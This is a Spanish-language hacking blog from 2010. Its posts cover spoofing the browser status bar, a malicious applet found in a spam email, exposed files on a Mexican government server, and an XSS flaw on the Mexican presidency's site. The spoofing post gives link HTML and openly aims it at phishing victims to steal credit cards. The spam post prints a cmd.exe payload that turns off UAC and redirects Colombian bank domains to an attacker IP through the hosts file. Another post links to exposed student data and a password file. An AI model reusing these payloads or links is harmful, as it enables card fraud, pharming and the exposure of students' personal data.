Mi nombre es Dylan Fosado





Soy Vegetariano

tengo 16 años D:

soy un pendejo 'x'

estudio la preparatoria



creci con una pc desde el '93 :O



pero en si descubri que existia este mundo a los 9 años...

(aclaro que descubri que existia pero no tenia ni puta idea de como se ocntrolaba nada xd)



soy administrador de www.egoflog.com (igual ni es gran cosa xd]



soy muy modesto :$ altruista y MAMON :D



contacto: dylan[at]egoflog[dot]com


Blogroll: 17

[x] Agregar a dy74h4nd120

w0rm w0rm
isseu isseu
horseryy horseryy
rash rash
zeusok zeusok
ziion2000 ziion2000
n350k n350k
zer0max zer0max
hkm hkm
1410 1410
xzite xzite

... Ver todos

Perfil de dy74h4nd120

[x]Nick: dy74h4nd120
Rango: Master
País: ca
Visitas: 338320
Votos: 42
En Blogrolls: 15
Status: PM

Patrocinadores:


Anuncia aquí

[x] uso de Spoofing en barra de estados IE / Mozilla y Chrome

Publicado el 25/07/2010 12:07:00 en Hacking Web. Total de votos: 1  Votar

Tiempo sin postear D: y despues de hacer absolutamente NADA PRODUCTIVO... =/ e ignoro si esto ya estaba posteado, pues busque y no encontre lo que queria que a final de cuentas es lo que voy a postear :D

pues pasa que mi cachorra PoisonsanX xd se puso tite por que mozilla y asi le detectan su site para futuros cardeos =/

y eso solo pasa cuando alguna "victima" denuncia la pagina =/ blablabla...

no es el punto xd pero me puse a pensar....

alguna funcion para que muestre una URL CONFIABLE ( y que al hacer click siempre no sea esa ) y pense en algo como onmouseover...

pues no sabia si existia algo asi pero lo Googlie :B

taran! alguien ya habia pensado en eso :O

(lose... BIENVENIDO A LA RED... IDIOTA uU) jajaja

pues puse "onmouseover" "windows" "status" blablabla... ;$

y ya me imprimian los resultados ...

AHORA LO BUENO!!!

si yo me pongo a SPAMear :) y quisiera que mis victimas fueran seguras de hacer click si vieran en la barra de estado una url confiable es mucho mas seguro poderlas joder y tener CC's fresh ;$

aqui vamos con el Spoofing para IE

<a href="http://www.bbvvva.cool/login/dates/card.php" onmouseover="window.status='http://www.bbva.com';return true">BBVA</a>


ok, en IE se ve de 10; pero sucede que aunque la mayoria use IE habra quien use Chrome u Mozilla y ellos por defecto han desactivado esa kagada para evitar fraudes... como estos :$

PERO OH VALLA!! TARDE UN POCO PERO ENCONTRE LA MISMA CHINGADERA PERO FUNCIONAL EN MOZILLA Y CHROME :d (y IE para terminar de victorear ajua!!!)



<a href="http://www.disney.com" onclick="window.location='http://www.playboy.com'; return false;">Diviertete vistiendo de Bob a MurdeR uU</a>


taran!! :D cuando pasen el mouse por el link xd veran a www.disney.com cuando entraran a Playboy.com ;$ LOL XD

espero a alguien le sea de utilidad uU
no presumo nada... no encontre esto en concreto en DDLR...
y solo encontre el primero que no funcionaba en Mozilla ni Chrome =/

podra ser sencillo, pero a mi me ha salvado :B

Comentarios: 7 | Leer comentarios

[x] Correo Spam (Eliminacion de entradas Regedit y Envenenamiento de DNS)

Publicado el 21/07/2010 12:07:00 en Hacking Web. Total de votos: 3  Votar



HOY ENTRE A MI CORREO :O AL CUAL NORMALMENTE NUNCA ENTRO (por que es el mail que tenia desde los 8 años T-T sniffffff... haha y que aun uso pero aun asi tiene sus telarañas D:

pues a lo que voy! xD

que me llega un correo de un "periodico" desde un remitente des @microsoft.windowslive.com

Ok! muy creible (para la gente pendeja!)

y le di en mostrar contenido xP

y salia para que vieras un video en flash! claro es una imagen enlazada a un link...

no, no era un .exe

pero como tome mis precauciones hize lo siguiente

en mi querido mozilla firefox teclee lo siguiente antes de pegar la URL:

VIEW-SOURCE:

y la url del mierdero ese era la siguiente!

{no vallan a ser tan idiotas de hacerle click xD)

http://173.236.97.77/~mojondos/JavaApplet/Applet.php

y la muy chingona tenia por codigo fuente lo siguiente :P

<html>
   <head>
   </head>
   <body>
      <applet width='1' height='1' code='SunMicrosystems.class' archive='SunMicrosystems.jar'>
		<param name='first' value='cmd.exe /c @ECHO OFF & reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f & Reg add "hkey_local_machine\SOFTWARE\Microsoft\Security Center" /v UACDisableNotify /t reg_dword /d 00000001 /f & Reg add "hkey_local_machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 00000000 /f & REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f & echo 127.0.0.1 localhost >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.grupobancolombia.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.davivienda.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.avvillas.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.bbva.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 www.colmena.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 grupobancolombia.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 davivienda.com >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 avvillas.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 bbva.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & echo 193.164.133.57 colmena.com.co >>C:\WINDOWS\system32\drivers\etc\hosts & exit'>
 	  </applet>
   </body>
</html>


Comentarios: 9 | Leer comentarios

w0rm se owneo al confesar que le gusto :$

Publicado el 16/07/2010 12:07:00 en Off Topic.

una imagen dice mas que mil palabras... :E




HAPPY OWNED!!!

(p.d:solo pedi votito para sacarla a la luz :$ no soy tramposo :E)


Comentarios: 0 | Leer comentarios

[x] Algunos ficheros de un "index of/" de la SEP.GOB.MX

Publicado el 16/07/2010 12:07:00 en Bug Report. Total de votos: 6  Votar


.
e_e joder!!!

es una boludes no capo? ):

si no se encontro alguna cosilla interesante que nos permitiera acceso a dejar algun mensajito, es mas que obvio que no cuentan con un index y libremente puedes ver los directorios, que en si, podrian ser muy sensibles...

que encontre?

(base de datos de alumnos del pais)


BASE DE DATOS DE ALUMNOS DE VARIAS PARTES DEL PAIS
CURPS

FICHEROS .TXT .EXE. .XML ../ muchos ficheros de prueba

UN DIRECTORIO LLAMADO CONFICKER (creo)

y claramente el servidor de la SEP NO CUENTA CON UN ANTIVIRUS! =/


SE ENCONTRO UN FICHERO CON INFORMACION DEL SISTEMA:

http://secundaria1.sep.gob.mx/test.php


y algo curioso es que podria apostar que el que subia los ficheros subia puras pendejadas por que encontre "files" de "prueba" aja....

por ejemplo un .txt llamado number.txt

que de contenido tenia algo asi

1
2
3
4
5
6...


hasta el 155 creo e_e

quien carajo sube esas cosas? :S y no sube almenos un puto index para tapar los directorios?

no pense que con una dork como
inurl:"sep.gob.mx" "index of/"
fuera a salir algo pero es el colmo!!! salen como unas 10 paginas de busqueda :|


les dejo las 2 url para que entren y vean...

http://secundaria1.sep.gob.mx/
http://secundaria2.sep.gob.mx/


p.d: esto les va a encantar :D
http://secundaria1.sep.gob.mx/Desktop/alumnos_sadok.sql

OR

http://secundaria2.sep.gob.mx/gestion_1/PASS.txt


Comentarios: 0 | Leer comentarios

XSS en presidencia.gob.mx (ya parchado T-T)

Publicado el 13/07/2010 12:07:00 en Off Topic.




Bug XSS
Pagina: presidencia.gob.mx
Dork usada: ninguna inurl:"gob.mx" = (accidente/curioseando)
URL del XSS:
 [code]http://www.presidencia.gob.mx/index.php?DNA=44&URLR=" onmouseover="alert('xss')"



Tomese en cuenta que es la pagina del presidente de la republica (actualmente felipe calderon)
se busco en toda la pagina bug's, sin exito.... las id= no mostraban vulnerabilidad a iSQL
y los campos de texto filtraba todo caracter especial y si no existia el articulo era redirigido
al index oh a las noticias sobre el paìs, hasta abajo se encontro curiosos links que redireccionaban
a paginas recomendadas por el presidente: cuando una url no era valida mostraba un error en un link <--

al hacer esto el link solo obedecia el error para ser mostrado, ya que era un link puro, se penso que al envenenarlo
obedeceria la inyeccion de forma fiel.... se metio un "onmouseover="alert('xss') para probar, se paso el mouse y ejecuto
la alerta, se probo con iframes y con inyeccion de php pero no tuvo exito, se puede hacer XSS tuneling, "Defaces Temporales"
el problema de este XSS es que esta en una constante redireccion que fue programada para evitar "errores" entonces podria ser
un tanto molesto, pero el BUG existe, Y NO HA SIDO PARCHADO....

y claro, ni me tomo la molestia de reportarlo...

l0ve respondio como podria explotarlo...CLICK AQUI!

con un poco de maña podria conseguirse la sesion del webmaster, y con un poco de suerte kakearla xP (por decirlo asi xP)


ACTUALIZACION:YA PARCHARON EL 'XSS' SE PUSIERON LISTOS !!!

Comentarios: 0 | Leer comentarios